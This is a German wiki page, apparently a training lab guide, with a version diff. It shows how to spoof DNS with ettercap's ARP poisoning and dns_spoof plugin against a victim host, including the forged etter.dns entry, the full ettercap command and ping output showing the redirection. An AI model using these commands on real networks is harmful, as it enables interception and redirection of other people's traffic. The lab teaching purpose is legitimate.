Dnspoof mit ettercap plugin: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(→OPFER) |
|||
| Zeile 14: | Zeile 14: | ||
*ettercap -Tq -i eth0 -M arp -P dns_spoof /$OPFER,$ANGREIFER///$ANGREIFER,$OPFER// | *ettercap -Tq -i eth0 -M arp -P dns_spoof /$OPFER,$ANGREIFER///$ANGREIFER,$OPFER// | ||
=OPFER= | =OPFER= | ||
| − | *ping | + | *ping userver.secure.local |
PING www.xinux.de (10.0.10.101) 56(84) bytes of data. | PING www.xinux.de (10.0.10.101) 56(84) bytes of data. | ||
64 bytes from kali.secure.local (10.0.10.101): icmp_seq=1 ttl=64 time=0.444 ms | 64 bytes from kali.secure.local (10.0.10.101): icmp_seq=1 ttl=64 time=0.444 ms | ||
64 bytes from kali.secure.local (10.0.10.101): icmp_seq=2 ttl=64 time=0.395 ms | 64 bytes from kali.secure.local (10.0.10.101): icmp_seq=2 ttl=64 time=0.395 ms | ||
64 bytes from kali.secure.local (10.0.10.101): icmp_seq=3 ttl=64 time=0.263 ms | 64 bytes from kali.secure.local (10.0.10.101): icmp_seq=3 ttl=64 time=0.263 ms | ||
Version vom 29. Juli 2021, 09:46 Uhr
Packet
- apt-get install ettercap-graphical
OPFER
- host -4 userver.secure.local
userver.secure.local has address 10.0.10.103
Angreifer
host anlegen
- echo -e "userver.secure.local A 10.0.10.101" > /etc/ettercap/etter.dns
ettercap mit dns plugin starten
- OPFER=10.0.10.104
- ANGREIFER=10.0.10.101
- ettercap -Tq -i eth0 -M arp -P dns_spoof /$OPFER,$ANGREIFER///$ANGREIFER,$OPFER//
OPFER
- ping userver.secure.local
PING www.xinux.de (10.0.10.101) 56(84) bytes of data. 64 bytes from kali.secure.local (10.0.10.101): icmp_seq=1 ttl=64 time=0.444 ms 64 bytes from kali.secure.local (10.0.10.101): icmp_seq=2 ttl=64 time=0.395 ms 64 bytes from kali.secure.local (10.0.10.101): icmp_seq=3 ttl=64 time=0.263 ms